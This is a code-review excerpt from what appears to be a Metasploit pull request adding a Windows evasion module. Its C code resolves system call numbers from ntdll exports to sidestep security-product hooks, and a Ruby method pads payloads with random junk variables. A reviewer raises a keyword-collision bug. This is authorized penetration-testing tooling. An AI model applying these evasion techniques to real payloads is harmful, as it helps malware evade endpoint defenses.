modules/evasion/windows/syscall_inject.rb

```diff
@@ -0,0 +1,558 @@
+        PWORD Ordinals = _RVA2VA(PWORD, DllBase, ExportDirectory->AddressOfNameOrdinals);
+
+        // Populate _SyscallList with unsorted Zw* entries.
+        DWORD i = 0;
+        P_SYSCALL_ENTRY Entries = _SyscallList.Entries;
+        do
+        {
+            PCHAR FunctionName = _RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);
+
+            // Is this a system call?
+            if (*(USHORT*)FunctionName == 'wZ')
+            {
+                Entries[i].Hash = HashSyscall(FunctionName);
+                Entries[i].Address = Functions[Ordinals[NumberOfNames - 1]];
+
+                i++;
+                if (i == MAX_SYSCALLS) break;
+            }
+        } while (--NumberOfNames);
+
+        // Save total number of system calls found.
+        _SyscallList.Count = i;
+
+        // Sort the list by address in ascending order.
+        for (DWORD i = 0; i < _SyscallList.Count - 1; i++)
+        {
+            for (DWORD j = 0; j < _SyscallList.Count - i - 1; j++)
+            {
+                if (Entries[j].Address > Entries[j + 1].Address)
+                {
+                    // Swap entries.
+                    SYSCALL_ENTRY TempEntry;
+
+                    TempEntry.Hash = Entries[j].Hash;
+                    TempEntry.Address = Entries[j].Address;
+
+                    Entries[j].Hash = Entries[j + 1].Hash;
+                    Entries[j].Address = Entries[j + 1].Address;
+
+                    Entries[j + 1].Hash = TempEntry.Hash;
+                    Entries[j + 1].Address = TempEntry.Address;
+                }
+            }
+        }
+
+        return TRUE;
+    }
+
+    extern DWORD GetSyscallNumber(DWORD FunctionHash)
+    {
+        if (!PopulateSyscallList()) return -1;
+        for (DWORD i = 0; i < _SyscallList.Count; i++)
+        {
+            if (FunctionHash == _SyscallList.Entries[i].Hash)
+            {
+                return i;
+            }
+        }
+        return -1;
+    }
+    @
+  end
+
+  def filler
+    %(
+            char* #{Rex::Text.rand_text_alpha(3..10)} = "#{Rex::Text.rand_mail_address}";
+            char* #{Rex::Text.rand_text_alpha(3..10)} = "#{Rex::Text.rand_mail_address}";
+            char* #{Rex::Text.rand_text_alpha(3..10)} = "#{Rex::Text.rand_name} #{Rex::Text.rand_surname}";
+            char* #{Rex::Text.rand_text_alpha(3..10)} = "#{Rex::Text.rand_mail_address}";
+            char* #{Rex::Text.rand_text_alpha(3..10)} = "#{Rex::Text.rand_guid}";
+            char* #{Rex::Text.rand_text_alpha(3..10)} = "#{Rex::Text.rand_guid}";
+            char* #{Rex::Text.rand_text_alpha(3..10)} = "#{Rex::Text.rand_guid}";
+            char* #{Rex::Text.rand_text_alpha(3..10)} = "#{Rex::Text.rand_guid}";
+            char* #{Rex::Text.rand_text_alpha(3..10)} =  "#{Rex::Text.rand_name} #{Rex::Text.rand_surname}";
+            char* #{Rex::Text.rand_text_alpha(3..10)} =  "#{Rex::Text.rand_name} #{Rex::Text.rand_surname}";
```

Comment:
Is there the possibility of this generating valid reserved C keywords? That's a problem we recently spotted with JSP payloads

https://github.com/rapid7/metasploit-framework/pull/15436
https://github.com/rapid7/rex-random_identifier/pull/6

Reply:
Yeah you are right, I will fix this right away.